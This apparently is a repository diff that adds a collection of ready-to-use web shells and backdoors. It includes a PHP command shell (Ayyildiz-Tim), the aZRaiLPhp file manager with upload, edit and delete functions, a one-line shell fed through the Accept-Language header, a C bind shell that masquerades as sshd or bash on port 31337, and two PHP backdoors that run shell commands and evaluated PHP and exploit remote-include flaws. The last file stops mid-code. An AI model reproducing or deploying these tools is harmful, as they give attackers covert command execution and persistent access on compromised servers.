BORDER-RIGHT: #df827a 3px ridge; BORDER-TOP: #df827a 3px ridge; BORDER-LEFT: #df827a 3px ridge; SCROLLBAR-ARROW-COLOR: #ffffff; BORDER-BOTTOM: #df827a 3px ridge; SCROLLBAR-BASE-COLOR: #df827a
}
.ldtab1 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtab2 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtab3 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtxt1 {
PADDING-RIGHT: 15px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 15px; OVERFLOW: auto; WIDTH: 500px; COLOR: #df3f1f; SCROLLBAR-ARROW-COLOR: #ffffff; PADDING-TOP: 15px; FONT-FAMILY: Comic Sans MS; SCROLLBAR-BASE-COLOR: #df827a; HEIGHT: 560px; TEXT-ALIGN: center
}
.ldtxt2 {
FONT-SIZE: 9pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:link {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:visited {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:active {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:hover {
BORDER-RIGHT: #df3f1f thin dotted; BORDER-TOP: #df3f1f thin dotted; FONT-SIZE: 9pt; BORDER-LEFT: #df3f1f thin dotted; COLOR: #df3f1f; BORDER-BOTTOM: #df3f1f thin dotted; FONT-FAMILY: Comic Sans MS
}
A {
TEXT-DECORATION: none
}
</STYLE>
<!-- MELEK -->
<DIV align=center>
<DIV id=welle
style="FONT-SIZE: 34pt; FILTER: Wave(freq=1, light=50, phase=50, strength=1); WIDTH: 100%; COLOR: #ffffff"><FONT
color=#ff0000><FONT color=#ffffff><FONT color=#ff0000><FONT
color=#ffffff><FONT color=#ff0000> <FONT color=#ffffff> </font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff><FONT
color=#ff0000></DIV></DIV>
<DIV align=center></DIV>
<SCRIPT language=JavaScript>
<!--
function welle()
{
if(document.all.welle.filters[0].freq > 10)
document.all.welle.filters[0].freq = 5;
document.all.welle.filters[0].freq += 1;
if(document.all.welle.filters[0].phase > 100)
document.all.welle.filters[0].phase = 0;
document.all.welle.filters[0].phase += 10;
if(document.all.welle.filters[0].strength > 10)
document.all.welle.filters[0].strength = 1;
document.all.welle.filters[0].strength += 1;
window.setTimeout("welle()",100);
}
welle();
file://-->
</SCRIPT>
</FONT></TD></TR></TBODY></TABLE></DIV>
<?php
define('PHPSHELL_VERSION', '');
?>
<html>
<head>
<title>Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?></title>
<style type="text/css">
<!--
.style1 {color: #FF0000}
.style2 {
font-family: Tahoma;
font-size: 9px;
font-weight: bold;
}
-->
</style>
</head>
<body>
<div align="center">
<table width="918" height="484" border="15">
<tr>
<td width="880"><h1 align="center" class="style1"><img src="http://www.ayyildiz.org/board/images/shine/misc/logo.jpg" width="880" height="200"></h1>
<div align="center"><span class="style1"><?php echo PHPSHELL_VERSION ?></span> <?php
if (ini_get('register_globals') != '1') {
/* We'll register the variables as globals: */
if (!empty($HTTP_POST_VARS))
extract($HTTP_POST_VARS);
if (!empty($HTTP_GET_VARS))
extract($HTTP_GET_VARS);
if (!empty($HTTP_SERVER_VARS))
extract($HTTP_SERVER_VARS);
}
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
/* A workdir has been asked for */
if (!empty($command)) {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == '/') {
$new_dir = $regs[1]; // 'cd /something/...'
} else {
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
unset($command);
}
}
}
if (file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');
?>
</div>
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
<p align="center"><strong>Bulundugunuz Dizin</strong>: <b>
<?php
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
$path = '';
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= '/' . $work_dir_splitted[$i];
printf('<a href="%s?work_dir=%s">%s</a>/',
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
}
}
?>
</b></p>
<p align="center"><strong>Dizin Degistir</strong> :
<select name="work_dir" onChange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == '.') {
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
} elseif ($dir == '..') {
/* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There's no
parent directory then. */
} elseif (strrpos($work_dir, '/') == 0) {
/* The last / in work_dir were the first charecter.
This means that we have a top-level directory
eg. /bin or /home etc... */
echo "<option value=\"/\">Parent Directory</option>\n";
} else {
/* We do a little bit of string-manipulation to find the parent
directory... Trust me - it works :-) */
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
} else {
if ($work_dir == '/') {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
} else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select>
</p>
<p align="center"><strong>Komut</strong>:
<input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Komut Calistir">
</p>
<p align="center"><strong>Surekli Bagli Kal</strong>
<input type="checkbox" name="stderr">
</p>
<div align="center">
<textarea name="textarea" cols="80" rows="20" readonly>
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'phpshell');
$command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile";
} else if ($command == 'ls') {
/* ls looks much better with ' -F', IMHO. */
$command .= ' -F';
}
system($command);
}
?>
</textarea>
</div>
</form>
<div align="center">
<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>
</div> <hr align="center"> <p align="center" class="style2">Copyright &copy; 2006&ndash;2007, Powered byThehacker. v 2.1 - <a href="http|//www.ayyildiz.org" class="style1">www.ayyildiz.org</a> </p>
<p align="center" class="style2"> Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.</p>
<p align="center"><img src="http://ayyildiz.org/images/whosonline2.gif" width="60" height="45"> </p></td>
</tr>
</table>
</div>
</body>
</html>
</font></font></font></font></font></font></font></font></font></font></font>
</font>
<!--
/*
I Always Love Sha
*/
</BODY></HTML>

284
138shell/A/aZRaiLPhp v1.0.txt Normal file
View file

@ -0,0 +1,284 @@
<?php
$default=$DOCUMENT_ROOT;
$this_file="./azrailphp.php";
if(isset($save)){
$fname=str_replace(" ","_",$fname);
$fname=str_replace("%20","_",$fname);
header("Cache-control: private");
header("Content-type: application/force-download");
header("Content-Length: ".filesize($save));
header("Content-Disposition: attachment; filename=$fname");
$fp = fopen($save, 'r');
fpassthru($fp);
fclose($fp);
unset($save);
exit;
}
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SÝLÝNDÝ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
}
if ($op=='phpinfo'){
$fonk_kap = get_cfg_var("fonksiyonlarý_kapat");
echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalýþmýyiii</center>";
exit;
}
echo "<html>
<head>
<title>azrail 1.0 by C-W-M</title>
</head>
<body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
</body>";
echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
<center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
<br>";
echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
echo "<br>
<br>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<div align=center>
<font size='+1' color='#0000FF'>Root Klasör: $DOCUMENT_ROOT</font><br>
<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
if(!isset($dir)){
$dir="$default";
}
echo "<input type=text size=60 name=dir value='$dir'>
<input type=submit value='GIT'><br>
</form>
</div>";
if ($op=='up'){
$path=dir;
echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
if(isset($dosya_gonder)) {
if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
echo "<center><font color='#0000FF'>Dosya Baþarýyla Gönderildi</font></center>";
}
} elseif(empty($dosya_gonder)) {
$path=$dir;
$dir = $dosya_dizin;
echo "$dir";
echo "<FORM ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
echo "</form>";
echo "</html>";
} else {
die ("<center><font color='#FF0000'>Dosya kopyalanamýyor!</font><center>");
}
}
if($op=='mf'){
$path=$dir;
if(isset($dismi) && isset($kodlar)){
$ydosya="$path/$dismi";
if(file_exists("$path/$dismi")){
$dos= "Böyle Bir Dosya Vardý Üzerine Yazýldý";
} else {
$dos = "Dosya Oluþturuldu";
}
touch ("$path/$dismi") or die("Dosya Oluþturulamýyor");
$ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açýlamýyor");
fwrite($ydosya2, $kodlar) or die("Dosyaya yazýlamýyor");
fclose($ydosya2);
echo "<center><font color='#0000FF'>$dos</font></center>";
} else {
echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
echo "<center>Dosya Ýsmi :<input type='text' name='dismi'></center><br>";
echo "<br>";
echo "<center>KODLAR</center><br>";
echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
}
if($op=='md'){
$path=$dir;
if(isset($kismi) && isset($okmf)){
$klasör="$path/$kismi";
mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluþturulamýyor</font></center>");
echo "<center><font color='#0000FF'>Klasör Oluþturuldu</font></center>";
}
echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
echo "<center>Klasör Ýsmi :<input type='text' name='kismi'></center><br>";
echo "<br>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
if($op=='del'){
unlink("$fname");
}
if($op=='dd'){
$dir=$here;
$deldirs=$yol;
if(!file_exists("$deldirs")) {
echo "<font color=\"#ff0000\">Dosya Yok</font>";
} else {
deltree($deldirs);
}
}
if($op=='edit'){
$yol=$fname;
$yold=$path;
if (isset($ok)){
$dosya = fopen("$yol", 'w') or die("Dosya Açýlamýyor");
$metin=$tarea;
fwrite($dosya, $metin) or die("Yazýlamýyor!");
fclose($dosya);
echo "<center><font color='#0000FF'Dosya Baþarýyla Düzenlendi</font></center>";
} else {
$path=$dir;
echo "<center>DÜZENLE: $yol</center>";
$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açýlamýyor</font></center>");
$boyut=filesize($yol);
$duzen = @fread ($dosya, $boyut);
echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
fclose($dosya);
$duzen=htmlspecialchars($duzen);
echo "</form>";
}
}
if($op=='efp2'){
$fileperm=base_convert($_POST['fileperm'],8,10);
echo $msg=@chmod($dir."/".$dismi2,$fileperm) ? "<font color='#0000FF'><b>$dismi2 ÝSÝMLÝ DOSYANIN</font></b>" : "<font color=\"#ff0000\">DEÝÞTÝRÝLEMEDÝ!!</font>";
echo " <font color='#0000FF'>CHMODU ".substr(base_convert(@fileperms($dir."/".$dismi2),10,8),-4)." OLARAK DEÝÞTÝRÝLDÝ</font>";
}
if($op=='efp'){
$izinler2=substr(base_convert(@fileperms($fname),10,8),-4);
echo "<form method=post action=./$this_file?op=efp2>
<div align=center><input name='dismi2' type='text' value='$dismi' class='input' readonly>CHMOD:
<input type='text' name='fileperm' size='20' value='$izinler2' class='input'>
<input name='dir' type='hidden' value='$yol'>
<input type='submit' value='TAMAM' class='input'></div><br>
</form>";
}
$path=$dir;
if(isset($dir)){
if ($dir = @opendir("$dir")) {
while (($file = readdir($dir)) !== false) {
if($file!="." && $file!=".."){
if(is_file("$path/$file")){
$disk_space=filesize("$path/$file");
$kb=$disk_space/1024;
$total_kb = number_format($kb, 2, '.', '');
$total_kb2="Kb";
echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
echo "<br></div>\n";
}else{
echo "<div align=left><a href='./$this_file?dir=$path/$file'>GÝT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
echo "<font color='#FFFF00'>$dirperm</font>";
echo " <br></div>\n";
}
}
}
closedir($dir);
}
}
echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
if(file_exists("B:\\")){
echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
} else {}
if(file_exists("C:\\")){
echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
} else {}
if (file_exists("D:\\")){
echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
} else {}
if (file_exists("E:\\")){
echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
} else {}
if (file_exists("F:\\")){
echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
} else {}
if (file_exists("G:\\")){
echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
} else {}
if (file_exists("H:\\")){
echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
} else {}
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>SERVER BÝLGÝLERÝ</b></font><br></center>";
echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
echo "<br>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center><font size='+1' color='#FF0000'><b>ÝÞLEMLER</b></font><br></center>";
echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluþtur</a></font></center>";
echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluþtur</a></font></center>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<center>Tüm haklarý sahibi C-W-M'ye aittir</center><br>";
?>

1
138shell/A/accept_language.txt Normal file
View file

@ -0,0 +1 @@
<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>

72
138shell/B/Blind Shell.cpp.txt Normal file
View file

@ -0,0 +1,72 @@
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <stdlib.h>
#include <sys/socket.h>
#define BUFSIZ 256
int main(int argc,char *argv[]){
int insock,s,port=31337;
char pass[BUFSIZ+2]="foo";
ssize_t size;
struct sockaddr_in servaddr,cliaddr;
unsigned int len;
char *newname;
if(fork()!=0)
return 0;
srand(time(NULL));
switch(rand()%4) {
case 0:
newname="sshd";
break;
case 1:
newname="-bash";
break;
case 2:
newname="sh";
break;
case 3:
newname="ps";
}
memset(argv[0],0,strlen(argv[0]));
strcpy(argv[0],newname);/*changeprocessname*/
close(0);
close(1);
close(2);
servaddr.sin_family=AF_INET;
servaddr.sin_port=htons(port);
servaddr.sin_addr.s_addr=htonl(INADDR_ANY);
s=socket(AF_INET,SOCK_STREAM,0);
bind(s,(struct sockaddr*)&servaddr,sizeof(servaddr));
listen(s,10);
for(;;) {
len=sizeof(cliaddr);
insock=accept(s,(struct sockaddr*)&cliaddr,&len);
if(fork()==0) {
char buf[BUFSIZ+2]={};
send(insock,"pass?",6,0);
size=recv(insock,&buf,BUFSIZ,0);
if(strncmp(buf,pass,strlen(pass))) {
send(insock,"WRONG!\n",8,0);
close(insock);
exit(0);
}
dup2(insock,0);
dup2(insock,1);
dup2(insock,2);
execl("/bin/sh","sh","-i",(char*)0);
close(insock);
exit(-1); /* should not reach this point */
}
}
}

181
138shell/B/backdoor1.txt Normal file
View file

@ -0,0 +1,181 @@
<?
/*
Backdoor php v0.1
Coded By Charlichaplin
charlichaplin@gmail.com
Join me: irc.fr.worldnet.net #s-c
Greetz: My dog :)
*/
class backdoor {
var $pwd;
var $rep;
var $list = array();
var $file;
var $edit;
var $fichier;
var $del;
var $shell;
var $proxy;
function dir() {
if(!empty($this->rep)) {
$dir = opendir($this->rep);
} else {
$dir = opendir($this->pwd);
}
while($f = readdir($dir)) {
if ($f !="." && $f != "..") {
$this->list[] = $f;
}
}
}
function view() {
$this->file = htmlentities(highlight_file($this->file));
}
function edit() {
if(!is_writable($this->edit)) {
echo "Ecriture impossible sur le fichier";
} elseif(!file_exists($this->edit)) {
echo "Le fichier n'existe pas ";
} elseif(!$this->fichier) {
$fp = fopen($this->edit,"r");
$a = "";
while(!feof($fp)) {
$a .= fgets($fp,1024);
}
echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";
} else {
$fp = fopen($this->edit,"w+");
fwrite($fp, $this->fichier);
fclose($fp);
echo "Le fichier a été modifié";
}
}
function del() {
if(is_file($this->del)) {
if(unlink($this->del)) {
echo "Fichier supprimé";
} else {
echo "Vous n'avez pas les droits pour supprimer ce fichier";
}
} else {
echo $this->del." n'est pas un fichier";
}
}
function shell() {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
system($this->shell);
}
function proxy($host,$page) {
$fp = fsockopen($host,80);
if (!$fp) {
echo "impossible d'etablir un connection avec l'host";
} else {
$header = "GET ".$page." HTTP/1.1\r\n";
$header .= "Host: ".$host."\r\n";
$header .= "Connection: close\r\n\r\n";
fputs($fp,$header);
while (!feof($fp)) {
$line = fgets($fp,1024);
echo $line;
}
fclose($fp);
}
}
function ccopy($cfichier,$cdestination) {
if(!empty($cfichier) && !empty($cdestination)) {
copy($cfichier, $cdestination);
echo "Le fichier a été copié";
} else {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
}
}
}
if(!empty($_REQUEST['rep'])) {
$rep = $_REQUEST['rep']."/";
}
$pwd = $_SERVER['SCRIPT_FILENAME'];
$pwd2 = explode("/",$pwd);
$file = $_REQUEST['file'];
$edit = $_REQUEST['edit'];
$fichier = $_POST['fichier'];
$del = $_REQUEST['del'];
$shell = $_REQUEST['shell'];
$proxy = $_REQUEST['proxy'];
$copy = $_REQUEST['copy'];
$cfichier = $_POST['cfichier'];
$cdestination = $_POST['cdestination'];
$n = count($pwd2);
$n = $n - 1;
$pwd = "";
for ($i = 0;$i != $n;$i = $i+1) {
$pwd .= "/".$pwd2[$i];
}
if($proxy) {
$host2 = explode("/",$proxy);
$n = count($host2);
$host = $host2[2];
$page = "";
for ($i = 3;$i != $n;$i = $i+1) {
$page .= "/".$host2[$i];
}
echo $page;
}
echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
$backdoor = new backdoor();
$backdoor->pwd = $pwd;
$backdoor->rep = $rep;
$backdoor->file = $file;
$backdoor->edit = $edit;
$backdoor->fichier = $fichier;
$backdoor->del = $del;
$backdoor->shell = $shell;
$backdoor->proxy = $proxy;
echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
$backdoor->dir();
echo "</TD></TR></TABLE><PRE>";
echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\" \"> <A HREF=\"\">Name</A> <A HREF=\"\">Last modified</A> <A HREF=\"\">Size</A> <A HREF=\"\">Description</A>";
echo "<HR noshade align=\"left\" width=\"80%\">";
if($file) {
$backdoor->view();
} elseif($edit) {
$backdoor->edit();
} elseif($del) {
$backdoor->del();
} elseif($shell) {
$backdoor->shell();
}elseif($proxy) {
$backdoor->proxy($host,$page);
}elseif($copy == 1) {
$backdoor->ccopy($cfichier,$cdestination);
} else {
echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A> ".date("r",realpath($rep."../"))." - <br>";
foreach ($backdoor->list as $key => $value) {
if(is_dir($rep.$value)) {
echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A> ".date("r",filemtime($rep.$value))." - <br>";
} else {
echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A> <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a> ".date("r",filemtime($rep.$value))." 1k <br>";
}
}
}
echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
echo "<center><b>Coded By Charlichaplin</b></center>";
echo "</BODY></HTML>";

234
138shell/B/backdoorfr.txt Normal file
View file

@ -0,0 +1,234 @@
<?
print("<html><head><title>Backdoor PHP codée par rAidEn & LFL</title></head><body
bgcolor=\"white\" LINK=\"blue\" VLINK=\"blue\">");
print("<p align=\"center\"><font size=\"5\">Exploit include v1.0</font></p>");
print("<p>Ce script permet d'exploiter une faille include ou une frame mal placée de type :
www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tant que backdoor sur un serveur pour garder une porte d'entrée dérobée.<br><br>
<u>par rAidEn & LFL , article publié dans The Hackademy Journal numéro 12</u><br><br>Spécial greetz à : Crash_FR, MatraX, Elboras, papar0ot, Lostnoobs, Icarus, Xelory, L_Abbe, Daedel, DHS-team, Carlito, xdream_blue, redils, IHC, Wanadobe.biz, #abyssal, #cod4, #hzv, #security-corp, #Revolsys, ...... et tout ceux que j'ai oublié & aussi et surtout à (feu)tim-team</p>");
/******Code source du système de remote*****/
$QS = $QUERY_STRING;
if(!stristr($QS, "separateur") && $QS!="") $QS .= "&separateur";
if(!stristr($QS, "separateur") && $QS=="") $QS .= "separateur";
/*pour les forms*********************************/
$tab = explode("&", $QS);
$i=0;
$remf = "";
while( $tab[$i] != "" && $tab[$i-1] != "separateur" )
{
$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
eval("\$temp2=\${$temp};");
$remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
."'>\n";
$i++;
}
/*
$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
if($temp!="")
{
eval("\$temp2=\${$temp};");
$remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
."'>\n";
}*/
/************************************************/
/*pour les links*********************************/
if($QS != "separateur")
$reml = "?" . str_replace(strchr($QS, "&separateur"), "", $QS) .
"&separateur";
else $reml = "?$QS";
$adresse_locale = $reml;
/************************************************/
print("<hr>");
print("<a href=\"$adresse_locale&option=1\">Exécuter une commande dans un shell</a><br> <!-- utiliser exec($commande, $retour); -->");
print("<a href=\"$adresse_locale&option=2\">Exécuter du code PHP</a><br>");
print("<a href=\"$adresse_locale&option=3\">Lister un répertoires</a><br>");
print("<a href=\"$adresse_locale&option=4\">Gérer les fichiers</a><br>");
print("<a href=\"$adresse_locale&option=5\">Envoyer un mail</a><br>");
print("<a href=\"$adresse_locale&option=6\">Infos serveur</a><br>");
print("<a href=\"mailto:raiden_cyb@hotmail.com\">Contacter le créateur</a><br><hr>");
/* récupération des variables : la fonction $_REQUEST n'existant pas avant php 4.1.0, vous devrez alors commenter ces lignes */
$option = $_REQUEST["option"];
$rep = $_REQUEST["rep"];
$nom = $_REQUEST["nom"];
$option_file = $_REQUEST["option_file"];
$cmd = $_REQUEST["cmd"];
$code = $_REQUEST["code"];
$msg = $_REQUEST["msg"];
$option_mail = $_REQUEST["option_mail"];
$destinataire = $_REQUEST["destinataire"];
$sujet = $_REQUEST["sujet"];
$message = $_REQUEST["message"];
if($option == 1){
print("<form action=\"?\"> $remf Commande : <input type=\"text\" name=\"cmd\"></form>");
echo "<br> PS : peu de serveurs acceptent les commandes venant de PHP";
}
if($option == 2){
print("<form action=\"?\"> $remf Code : <input type=\"text\" name=\"code\"></form>");
}
if($option == 3){
print("<form action=\"?\"> $remf Répertoire à lister : <input type=\"text\" name=\"rep\"></form>");
print("$rep");
}
if($option == 4){
print("<br><form action=\"?\"> $remf");
print("<br>Nom du fichier :<br><input type=text name=\"nom\">");
print("<input type=hidden name=option value=$option>");
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"mkdir\" >Créer le
fichier");
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"edit\" >Éditer le
fichier");
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"del\" >Supprimer le
fichier");
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"read\" CHECKED>Lire le
fichier");
print("<input type=submit value=Go>");
print("</form>");
}
if($option == 5){
print("<PRE><form action=\"?\"> $remf Destinataire : <input type=\"text\" name=\"destinataire\" size=\"80\">");
print("<br>Provenance du mail : <input type=\"text\" name=\"provenance\" size=\"80\"><br>");
print("Adresse de retour : <input type=\"text\" name=\"retour\" size=\"80\"><br>");
print("Sujet : <input type=\"text\" name=\"sujet\" size=\"80\"><br>");
print("Message : <input type=\"text\" name=\"message\"
size=\"80\"><br><input type=\"submit\" value=\"Envoyer\"></form></PRE>");
}
if($option == 6){
echo"Nom du serveur : <a href=\"http://$SERVER_NAME\">$SERVER_NAME</a><br>
";
echo"Adresse IP du serveur : <a href=\"http://$SERVER_ADDR\">$SERVER_ADDR</a><br> ";
echo"Port utilisé par défault 80 : <font color=\"red\">$SERVER_PORT</font><br> ";
echo"Mail de l' admin : <a href=\"mailto:$SERVER_ADMIN\">$SERVER_ADMIN</a><br><br>";
echo"Racine du serveur : <font color=\"red\">$DOCUMENT_ROOT</font><br>";
echo"Adresse menant à COMMAND.COM : <font color=\"red\">$COMSPEC</font><br>";
echo"Path installé sur le serveur : <font color=\"red\">$PATH</font> <br>";
echo"OS, SERVEUR, version PHP : <font color=\"red\">$SERVER_SOFTWARE</font><br><br>";
echo"Version du protocole utilisé (HTTP) : <font color=\"red\">$SERVER_PROTOCOL</font><br>";
